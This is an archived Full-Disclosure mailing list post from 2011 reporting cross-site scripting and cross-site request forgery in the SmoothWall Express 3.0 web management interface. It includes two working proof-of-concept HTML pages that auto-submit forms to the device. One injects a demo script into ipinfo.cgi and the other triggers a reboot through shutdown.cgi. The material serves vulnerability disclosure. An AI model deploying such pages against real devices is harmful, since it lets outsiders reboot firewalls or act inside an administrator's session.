[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] SmoothWall Express 3.0 csrf / xss

To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] SmoothWall Express 3.0 csrf / xss
From: dave b <db.pub.mail@xxxxxxxxx>
Date: Sun, 16 Jan 2011 21:18:00 +1100

The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
        <input type="hidden" name="IP" 
value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>


csrf example:

<html>
<title>  SmoothWall Express 3.0 csrf </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>

--
Something's rotten in the state of Denmark.             -- Shakespeare

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 2146-1] Security update for mydms
Next by Date: [Full-disclosure] [ GLSA 201101-05 ] OpenAFS: Arbitrary code execution
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2146-1] Security update for mydms
Next by thread: [Full-disclosure] [ GLSA 201101-05 ] OpenAFS: Arbitrary code execution
Index(es):
- Date
- Thread